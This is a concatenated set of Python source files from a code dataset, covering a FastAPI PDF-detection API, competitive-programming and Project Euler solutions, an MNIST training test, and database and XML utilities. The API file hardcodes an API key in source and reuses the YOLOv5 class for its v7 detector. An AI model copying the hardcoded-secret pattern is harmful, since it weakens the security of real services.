'.join(buffer))\n                    buffer = []\n                buffer.append(entry[0])\n            elif entry[1] == 'I-BESKRIVELSE':\n                buffer.append(entry[0])\n        if buffer:\n            descriptions.append(' '.join(buffer))\n\n        return descriptions\n\n\nclass PDFAPI:\n    def __init__(self):\n        self.pdf_processor = None\n        self.yolov5_detector = None\n        self.yolov7_detector = None\n        self.data_extractor = None\n        self.ner_model = None\n\n    def process_pdf(self, pdf_path, image_folder_path):\n        self.pdf_processor = PDFProcessor(pdf_path, image_folder_path)\n        self.pdf_processor.convert_pdf_to_images()\n\n    def run_yolo_detection(self, v5weights_path, v7weights_path, conf_threshold, yolo_folder):\n        self.yolov5_detector = YOLOv5Detector(v5weights_path, conf_threshold, self.pdf_processor.pdf_images,\n                                              yolo_folder)\n        self.yolov7_detector = YOLOv5Detector(v7weights_path, conf_threshold, self.pdf_processor.pdf_images,\n                                              yolo_folder)\n\n        self.yolov5_detector.run_detection()\n        self.yolov7_detector.run_detection()\n\n    def extract_data(self, v5annotation_folder, v7annotation_folder, nlp_output=None):\n        self.data_extractor = DataExtractor(self.pdf_processor.pdf_images, v7annotation_folder)\n        # the extractor methods expect the image folder and annotation folder explicitly\n        extracted_data_v5 = self.data_extractor.extract_data_v5(self.pdf_processor.pdf_images, v5annotation_folder)\n        extracted_data_v7 = self.data_extractor.extract_data_v7(self.pdf_processor.pdf_images, v7annotation_folder)\n        combined_data = self.data_extractor.get_combined_data(extracted_data_v5, extracted_data_v7,\n                                                              self.pdf_processor.pages, nlp_output)\n        return combined_data\n\n    def load_ner_model(self, model_path, word2idx_path, tag2idx_path):\n        self.ner_model = NERModel(model_path, word2idx_path, tag2idx_path)\n
        self.ner_model.load_model()\n\n\nAPI_KEY = \"7cd12d16-286f-4b6f-a42b-7d55557e5b65\" # Replace with your actual API key\n\napi_key_header = APIKeyHeader(name=\"NER_API_Key\")\n\n\ndef verify_api_key(api_key: str = Depends(api_key_header)):\n    if api_key == API_KEY:\n        return True\n    else:\n        raise HTTPException(status_code=403, detail=\"Invalid API key\")\n\n\n@app.post(\"/predict/inco\")\nasync def main(\n    files: UploadFile = File(..., media_type=\"application/pdf\"),\n    authorized: bool = Depends(verify_api_key),\n):\n    # Persist the uploaded PDF so the pipeline below can read it from disk\n    pdf_path = \"/tmp/uploaded.pdf\" # Specify a temporary location for the uploaded PDF\n    with open(pdf_path, \"wb\") as f:\n        f.write(await files.read())\n\n    # Process PDF\n    image_folder_path = \"/tmp/images\" # Specify a temporary location for storing images\n    pdf_api = PDFAPI()\n    pdf_api.process_pdf(pdf_path, image_folder_path)\n\n    # Run YOLO Detection\n    v5weights_path = \"/path/to/v5/weights.pt\"\n    v7weights_path = \"/path/to/v7/weights.pt\"\n    conf_threshold = 0.3\n    yolo_folder = \"/path/to/yolov5\"\n    pdf_api.run_yolo_detection(v5weights_path, v7weights_path, conf_threshold, yolo_folder)\n\n    # Extract Data\n    v5annotation_folder = pdf_api.yolov5_detector.get_annotations()\n    v7annotation_folder = pdf_api.yolov7_detector.get_annotations()\n    combined_data = pdf_api.extract_data(v5annotation_folder, v7annotation_folder)\n\n    # Load NER Model\n    ner_model_path = \"/path/to/ner/model.h5\"\n    word2idx_path = \"/path/to/word2idx.pkl\"\n    tag2idx_path = \"/path/to/tag2idx.pkl\"\n    pdf_api.load_ner_model(ner_model_path, word2idx_path, tag2idx_path)\n\n    # Test Sentence Sample\n    test_sentence = \"Your test sentence here.\"\n    sentence_data = pdf_api.ner_model.test_sentence_sample(test_sentence)\n\n    return {\"combined_data\": combined_data, \"sentence_data\": sentence_data}\n","repo_name":"Sami-rana/Data_Science","sub_path":"Optimization.py","file_name":"Optimization.py","file_ext":"py","file_size_in_byte":28405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12559094495","text":"# 20056 Wizard Shark and Fireball\n\nimport sys\nfrom copy import deepcopy\n\ninput = sys.stdin.readline\n\nN, M, K = map(int, input().split())\n\ndx = [-1, -1, 0, 1, 1, 1, 0, -1]\ndy = [0, 1, 1, 1, 0, -1, -1, -1]\n\nboard = [[[] for _ in range(N)] for _ in range(N)]\n\ntmp_board = [[[] * N] * N for _ in range(N)]\n\n\nfor _ in range(M):\n    r, c, m, s, d = map(int, input().split())\n    if m != 0:\n        board[r - 1][c - 1].append([m, s, d])\n\n\nfor _ in range(K):\n    tmp_board = [[[] for _ in range(N)] for _ in range(N)]\n\n    for x in range(N):\n        for y in range(N):\n            if board[x][y] != []:\n                fire_len = len(board[x][y])\n                for f in range(fire_len):\n                    nm, ns, nd = board[x][y][f]\n                    nx, ny = x + dx[nd] * ns, y + dy[nd] * ns\n                    nx = (nx + N) % N\n                    ny = (ny + N) % N\n                    tmp_board[nx][ny].append([nm, ns, nd])\n\n    for x in range(N):\n        for y in range(N):\n            fire_len = len(tmp_board[x][y])\n            if fire_len > 1:\n                total_m, total_s, total_d = 0, 0, []\n                for f in range(fire_len):\n                    total_m += tmp_board[x][y][f][0]\n                    total_s += tmp_board[x][y][f][1]\n                    total_d.append(tmp_board[x][y][f][2] % 2)\n                total_m = int(total_m / 5)\n                total_s = int(total_s / fire_len)\n                tmp_board[x][y] = []\n\n                if total_m != 0:\n                    if sum(total_d) == 0 or sum(total_d) == fire_len:\n                        for i in range(4):\n                            tmp_board[x][y].append([total_m, total_s, i * 2])\n                    else:\n                        for j in range(4):\n                            tmp_board[x][y].append([total_m, total_s, j * 2 + 1])\n\n    board = deepcopy(tmp_board)\n\n\nsum_m = 0\nfor x in range(N):\n    for y in range(N):\n        if board[x][y] != []:\n            for b in range(len(board[x][y])):\n                sum_m += 
board[x][y][b][0]\n\nprint(sum_m)\n","repo_name":"ohjooyeong/PS","sub_path":"Baekjoon/20056.py","file_name":"20056.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73668628268","text":"from time import time\ndef somma(n):\n if n==1:\n return 1\n else: \n return n+somma(n-1)\n\n\n\ndef sommaquadrata(n):\n if n==1:\n return 1\n else: \n return n**2+sommaquadrata(n-1)\n\nstart_t = time()\nprint(somma(100)**2-sommaquadrata(100))\n\nprint(time() - start_t)\n","repo_name":"ku-alps/sw17_kiseok","sub_path":"Projecteuler/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40643442314","text":"a = set(int(i) for i in input().split())\nb = list(a)\nif 11 not in a: a.add(11)\nprint(a)\nrespair = []\nsorted(a)\nfor i in b:\n if(b.count(11 - i) != 0):\n respair.append((i, 11 - i))\nrespair = set(respair)\nrespair = tuple(respair)\nprint(11*len(respair) / 2)","repo_name":"NewbieNCuong/HIT_Private_Python","sub_path":"Homework_Day_5/Task5.py","file_name":"Task5.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8394439191","text":"\"\"\"\nTitle: Simple MNIST convnet\nAuthor: [fchollet](https://twitter.com/fchollet)\nDate created: 2015/06/19\nLast modified: 2020/04/21\nDescription: A simple convnet that achieves ~99% test accuracy on MNIST.\n\nW&B Notes:\n - From https://keras.io/examples/vision/mnist_convnet/\n - Source: https://github.com/keras-team/keras-io/blob/master/examples/vision/mnist_convnet.py\n - Added import magic line\n - Added lines to limit training data\n - Added flake8 noqa\n - Added random seed code\n\"\"\"\n\n# flake8: noqa\n\n\"\"\"\n## Setup\n\"\"\"\n\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom wandb import magic\n\n# Make sure this is reproducible\nnp.random.seed(1)\nimport tensorflow as tf\n\ntf.random.set_seed(2)\n\n\"\"\"\n## Prepare the data\n\"\"\"\n\n# Model / data parameters\nnum_classes = 10\ninput_shape = (28, 28, 1)\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n# Scale images to the [0, 1] range\nx_train = x_train.astype(\"float32\") / 255\nx_test = x_test.astype(\"float32\") / 255\n# Make sure images have shape (28, 28, 1)\nx_train = np.expand_dims(x_train, -1)\nx_test = np.expand_dims(x_test, -1)\nprint(\"x_train shape:\", x_train.shape)\nprint(x_train.shape[0], \"train samples\")\nprint(x_test.shape[0], \"test samples\")\n\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# limit training data\ndata_slice = 3000\nx_train = x_train[:data_slice, :]\ny_train = y_train[:data_slice, :]\nx_test = x_test[:data_slice, :]\ny_test = y_test[:data_slice, :]\n\n\"\"\"\n## Build the model\n\"\"\"\n\nmodel = keras.Sequential(\n [\n keras.Input(shape=input_shape),\n layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n layers.MaxPooling2D(pool_size=(2, 2)),\n layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n layers.MaxPooling2D(pool_size=(2, 2)),\n layers.Flatten(),\n layers.Dropout(0.5),\n layers.Dense(num_classes, activation=\"softmax\"),\n ]\n)\n\nmodel.summary()\n\n\"\"\"\n## Train the 
model\n\"\"\"\n\nbatch_size = 128\nepochs = 2\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\nmodel.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_split=0.1)\n\n\"\"\"\n## Evaluate the trained model\n\"\"\"\n\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Test loss:\", score[0])\nprint(\"Test accuracy:\", score[1])\n","repo_name":"wandb/wandb","sub_path":"tests/functional_tests/t0_main/magic/t1_mnist_convnet.py","file_name":"t1_mnist_convnet.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"27612966650","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\na = 0\nb = 5\nn = 25\nx = np.linspace(a,b,n)\nh = (b-a)/(n+1) #interval\ny=[]\ntempy = 1\nfor i in range(n):\n\ty.append(tempy)\n\tyn1 = 1 - x[i]*tempy\n\tyn2 = -x[i]*yn1 -tempy\n\tyn3 = -x[i]*yn2 - 2*yn1 \n\ttempy = tempy + yn1*h+yn2*h**2/2 + yn3*h**3/6\n\n#Plotting\nplt.plot(x,y)\nplt.grid()\nplt.xlabel('$x$')\nplt.ylabel('$y$')\n\n#Comment the following line\n#plt.savefig('../figs/taylor.eps')\nplt.show()\n\n","repo_name":"gadepall/numerical_methods","sub_path":"ode/manual/codes/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39101937728","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\nsys.path.append('..')\nfrom models.run_net import BarDetNet\nfrom prepare_data.gen_data_batch import gen_data_batch\nfrom config import cfg\nimport cv2\nimport os\nimport re\nfrom PIL import Image\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\ndef test(img_path):\n dim_w = 608\n dim_h = 608\n g_step = 40000\n is_training = False\n t = 0.5\n\n imgs_holder = tf.placeholder(tf.float32, shape=[1, dim_h, dim_w, 3])\n model = BarDetNet(imgs_holder, None, is_training)\n img_hw = tf.placeholder(dtype=tf.float32, shape=[2])\n boxes, scores, classes = model.predict(img_hw, iou_threshold=0.5, score_threshold=t)\n\n saver = tf.train.Saver()\n ckpt_dir = re.sub(r'examples/', '', cfg.ckpt_path_608)\n imgs = os.listdir(img_path)\n\n with tf.Session() as sess:\n configer = tf.ConfigProto()\n configer.gpu_options.per_process_gpu_memory_fraction = 0.3\n sess=tf.Session(config=configer)\n ckpt = tf.train.get_checkpoint_state(ckpt_dir)\n print(ckpt.model_checkpoint_path)\n #saver.restore(sess, ckpt.model_checkpoint_path)\n saver.restore(sess, ckpt_dir+str(g_step)+'_charbar.ckpt-'+str(g_step+1))\n\n for i in imgs:\n if 'png' not in i:\n continue\n\n image_path = os.path.join(img_path, i)\n image = cv2.imread(image_path)\n image = cv2.resize(image, (608,608))\n h, w, c = image.shape\n image_data = np.array(image, dtype='float32') / 255.0\n\n boxes_, scores_, classes_ = sess.run([boxes, scores, classes], feed_dict={img_hw:[h ,w], imgs_holder: np.reshape(image_data, [1, dim_h, dim_w, 3])})\n\n print(scores_)\n img = np.floor(image_data * 255 + 0.5).astype('uint8')\n for i in range(boxes_.shape[0]):\n box = boxes_[i]\n y_top, x_left, y_bottom, x_right = box\n cv2.rectangle(img, (int(x_left), int(y_top)), (int(x_right), int(y_bottom)), (0,0,0), 1)\n cv2.imshow('res', img)\n cv2.waitKey(0)\n\nif __name__ == '__main__':\n image_path = '../data/test_imgs/'\n 
    test(image_path)\n","repo_name":"vicwer/bar_char_det_rec","sub_path":"bar_chart_detect/examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5460058070","text":"import xml.etree.ElementTree as ET\nimport json\nimport re\n\n# The data is parsed from the dictionary, then the text is read from a txt file, split into sentences, and the matching tags are added for each section. Using the dictionary data we identify the various temporal elements in the text and wrap them in a TIMEEX tag with the corresponding values (id, value, type etc).\n\n\n\ninput_file = \"\"\n\n\ndef setare_input(input_file_tmp):\n    global input_file\n    input_file = input_file_tmp\n\n\ndef rulare():\n    with open(\"tmp\\\\dict_export\", \"r\") as fd:\n        dictionar = json.load(fd)\n    print(\"Dictionar : \", dictionar)\n\n    # split in sentences\n    with open(input_file, 'r') as f:\n        content = f.read()\n    # print(content)\n    sentences = re.split(r\"[?.!,]\", content)  # split on punctuation, not on the literal string \"?.!,\"\n    print(sentences)\n    print()\n    # sentences = content.split(\".\")\n    # print(\"Sentences : \", sentences)\n\n    xml_doc = ET.Element('TimeML')\n\n    # DOCNO tag\n    DOCNO = ET.SubElement(xml_doc, 'DOCNO', type='date', temporalFunction='false').text = '19980108'\n\n    # DOCTYPE tag\n    DOCTYPE = ET.SubElement(xml_doc, 'DOCTYPE', SOURCE='extract.txt').text = 'TimeEx'\n\n    # BODY tag\n    BODY = ET.SubElement(xml_doc, 'BODY')\n\n    # TEXT tag\n    TEXT = ET.SubElement(BODY, 'TEXT')\n    ok = 1\n    # s tag (sentences)\n    for i in sentences:\n        s = ET.SubElement(TEXT, 's')\n        for key, values in dictionar.items():\n            for value in values:\n                if value in i:\n                    # print(\"Value : \", value)\n                    # TIMEEX tag\n                    tag = ET.SubElement(s, 'TIMEEX', id='t' + str(ok), value=value, type=key, temporalFunction='true',\n                                        functionInDocument='NONE').text = value\n                    ok = ok + 1\n                    # print(ok)\n\n    tree = ET.ElementTree(xml_doc)\n    tree.write('output/exemplu.xml', encoding='UTF-8', xml_declaration=True)\n\n\nif __name__ == '__main__':\n    # raise Exception(\"Run the app from main.py\")\n    setare_input(\"..\\\\..\\\\input\\\\extract.txt\")\n    rulare()\n","repo_name":"paulsem/TILN","sub_path":"TimeEx/XML/xml_project.py","file_name":"xml_project.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7462200696","text":"from functools import reduce\r\n\r\ndef CheckEven(no):\r\n    if (no % 2==0):\r\n        return True\r\n    else:\r\n        return False\r\n\r\ndef Increase(no):\r\n    return no + 2\r\n\r\ndef add(A, B):\r\n    return A + B\r\n\r\ndef main():\r\n    data = [5, 4, 9, 8, 13, 17, 12, 18] #hardcoded list is predefined\r\n    print(data)\r\n\r\n    filter_output = list(filter(CheckEven, data))\r\n    print(filter_output)\r\n\r\n    map_output = list(map(Increase, filter_output))\r\n    print(map_output)\r\n\r\n    reduce_output = reduce(add, map_output)\r\n    print(reduce_output)\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n\r\n#program to check even odd using filter map reduce","repo_name":"iamchaitanya7/Py-Filter-Map-Reduce-LambdaFunc","sub_path":"FMR1.py","file_name":"FMR1.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3624194939","text":"import os\nimport math\nimport gammalib\nimport matplotlib.pyplot as plt\n\n\n# ========================================= #\n# Integrate using Trapezoid rule in log-log 
#\n# ========================================= #\ndef integrate_trapezoid_loglog(bkg, logE1, logE2):\n \"\"\"\n Integrate using Trapezoid rule in log-log\n \"\"\"\n # Get function values\n logf1 = math.log(bkg(logE1, 0.0, 0.0))\n logf2 = math.log(bkg(logE2, 0.0, 0.0))\n \n # Compute ln of energy boundaries\n lnE1 = logE1 * gammalib.ln10\n lnE2 = logE2 * gammalib.ln10\n \n # Compute integral using Trapezoid rule in log-log\n integral = (lnE2 - lnE1) * (math.exp(lnE1 + logf1) +\n math.exp(lnE2 + logf2)) * 0.5\n\n # Return integral\n return integral\n\n\n# ========================================= #\n# Integrate using Trapezoid rule in lin-lin #\n# ========================================= #\ndef integrate_trapezoid_linlin(bkg, logE1, logE2):\n \"\"\"\n Integrate using Trapezoid rule in lin-lin\n \"\"\"\n # Set number of energy bins\n nbins = 1000\n\n # Compute log energy bin size\n dlogE = (logE2-logE1)/float(nbins-1)\n\n # Perform integration\n integral = 0.0\n for i in range(nbins-1):\n logE_low = logE1 + i*dlogE\n logE_high = logE_low + dlogE\n dE = math.pow(10.0, logE_high) - math.pow(10.0, logE_low)\n integral += dE * (bkg(logE_low, 0.0, 0.0) + bkg(logE_high, 0.0, 0.0)) * 0.5\n\n # Return integral\n return integral\n\n\n# =============== #\n# Plot background #\n# =============== #\ndef plot_background(bkg, emin=0.020, emax=120.0):\n \"\"\"\n Plot background\n \"\"\"\n # Generate energy vector\n energies = gammalib.GEnergies(100, gammalib.GEnergy(emin,'TeV'),\n gammalib.GEnergy(emax,'TeV'))\n\n # Set energy values\n x = [energy.TeV() for energy in energies]\n y = [bkg(energy.log10TeV(), 0.0, 0.0) for energy in energies]\n\n # Get node energies\n i_eng = bkg.table().axis('ENERG')\n e_nodes = bkg.table().axis_nodes(i_eng)\n xo = [math.pow(10.0,logE) for logE in e_nodes]\n yo = [bkg(logE, 0.0, 0.0) for logE in e_nodes]\n\n # Compute integrals\n for i in range(len(xo)-1):\n if yo[i] > 0 and yo[i+1] > 0:\n integral_loglog = integrate_trapezoid_loglog(bkg, e_nodes[i], e_nodes[i+1])\n integral_linlin = integrate_trapezoid_linlin(bkg, e_nodes[i], e_nodes[i+1])\n print('%f-%f: %e %e (%f)' % (xo[i], xo[i+1], integral_loglog,\n integral_linlin,\n integral_loglog/integral_linlin))\n\n # Create figure\n plt.figure(1)\n plt.title('CTA Background')\n\n # Plot background\n plt.loglog(x, y, 'r-')\n plt.loglog(xo, yo, 'ro')\n\n # Set axes\n plt.xlabel(\"Energy (TeV)\")\n plt.ylabel(\"Background (events/s/MeV/sr)\")\n\n # Show plot\n plt.show()\n\n\n# ======================== #\n# Main routine entry point #\n# ======================== #\nif __name__ == '__main__':\n\n # Load background\n bkg = gammalib.GCTABackground3D('../../caldb/data/cta/prod2/bcf/South_50h/irf_file.fits')\n print(bkg)\n\n # Plot background\n plot_background(bkg)\n","repo_name":"gammalib/gammalib","sub_path":"inst/cta/test/dev/test_background_integration.py","file_name":"test_background_integration.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"12916759499","text":"import pandas as pd\nimport sys \nimport os\nimport argparse\nimport fnmatch\nimport collections\nimport gzip\n\ndir=\"/hpc/hub_oudenaarden/edann/hexamers\"\nfiles=[]\nfor file in os.listdir(dir):\n if fnmatch.fnmatch(file, 'TSS_rand.*'):\n files.append(dir+\"/\"+file)\n\n\ntss_dist_dic={}\nwith open(files[0], \"rb\") as f:\n\tfor line in f:\n\t\taline=line.decode().strip('\\n').split('\\t')\n\t\tif len([float(i) for i in 
aline[1:]])==5995:\n\t\t\ttss_dist_dic[aline[0]]=[float(i) for i in aline[1:]]\n\t\telse:\n\t\t\tprint(\"Error! Unexpected number of values in line \"+ aline[0])\n\t\t# cov_dict['\\t'.join([aline[i] for i in [0,1,2]])]=[int(i) for i in aline[4:]]\n\nfor file in files[1:]:\n\twith open(file,'rb') as f:\n\t\tfor line in f:\n\t\t\taline=line.decode().strip('\n').split('\t')\n\t\t\tif aline[0] not in tss_dist_dic.keys():\n\t\t\t\ttss_dist_dic[aline[0]]=[0]*5995\n\t\t\tif len([float(i) for i in aline[1:]])==5995 and aline[0]!=\"hex\":\n\t\t\t\tprint(\"File: \"+file+ \" Processing hex \"+aline[0]+\"...\")\t\n\t\t\t\ttss_dist_dic[aline[0]]=list(pd.Series(tss_dist_dic[aline[0]])+pd.Series([float(i) for i in aline[1:]]))\n\t\t\telse:\n\t\t\t\tprint(\"Error! Unexpected number of values in line \"+ aline[0])\n\noutput_file=dir+\"/sumRand_distances_conv.txt\"\ncolNames=tss_dist_dic.pop(\"hex\")\n# print('hex,'+','.join([str(v) for v in colNames]))\nwith open(output_file, \"w\") as output:\n\tprint('hex,'+','.join([str(v) for v in colNames]), file=output)\n\tfor key,val in tss_dist_dic.items():\n\t\tprint(key+','+','.join([str(v) for v in val]), file=output)","repo_name":"emdann/HexamerBias","sub_path":"base_composition/mergeTSStab.py","file_name":"mergeTSStab.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73949511786","text":"f_num=int(input(\"how many fibonacci numbers do you want to write?: \"))\n# build the sequence iteratively; the original index arithmetic produced wrong terms\na, b = 0, 1\nd = []\nfor _ in range(f_num):\n    d.append(b)\n    a, b = b, a + b\nprint(d)\n","repo_name":"k23040198/270201041","sub_path":"lab5/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28813833754","text":"import asyncio\nimport os\nimport ssl\n\nfrom sqlalchemy import Column, FetchedValue\nfrom sqlalchemy.dialects.postgresql import JSONB, UUID\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import sessionmaker, declarative_base\n\nBase = declarative_base()\n\n\nclass Flow(Base):\n    id = Column(UUID, primary_key=True, name='id', server_default=FetchedValue())\n    data = Column(JSONB, name='data')\n    __tablename__ = \"flow\"\n\n\nasync def async_main():\n    engine_kwargs = {}\n    if \"CA_CERT\" in os.environ:\n        sslctx = ssl.create_default_context(\n            ssl.Purpose.SERVER_AUTH,\n            cafile=os.environ[\"CA_CERT\"]\n        )\n        sslctx.check_hostname = False\n        engine_kwargs[\"connect_args\"] = {\n            \"ssl\": sslctx\n        }\n    engine = create_async_engine(\n        os.environ[\"DATABASE_URL\"],\n        **engine_kwargs\n    )\n    async_session: AsyncSession = sessionmaker(engine, expire_on_commit=False, class_=AsyncSession)\n    async with async_session() as session:\n        async with session.begin():\n            flow = Flow(data={\"status\": \"new\", \"metadata\": {\"bankId\": \"123\"}})\n            session.add(flow)\n    print(\"Hi\")\n\n\nasyncio.run(async_main())\n","repo_name":"obeleh/cockroach-async-loadtest","sub_path":"minimal.py","file_name":"minimal.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70115585068","text":"__author__ = \"www.eficent.com\"\n\n\nimport wizard\nimport netsvc\nimport pooler\nfrom tools.translate import _\nimport time\nfrom datetime import datetime\n\nclass 
wizard_invoice_number_repair(wizard.interface):\n \"\"\"\n Invoice number repair wizard.\n \"\"\"\n\n ############################################################################\n # Init form\n ############################################################################\n\n _init_fields = {\n }\n\n _init_form = \"\"\"\n
\n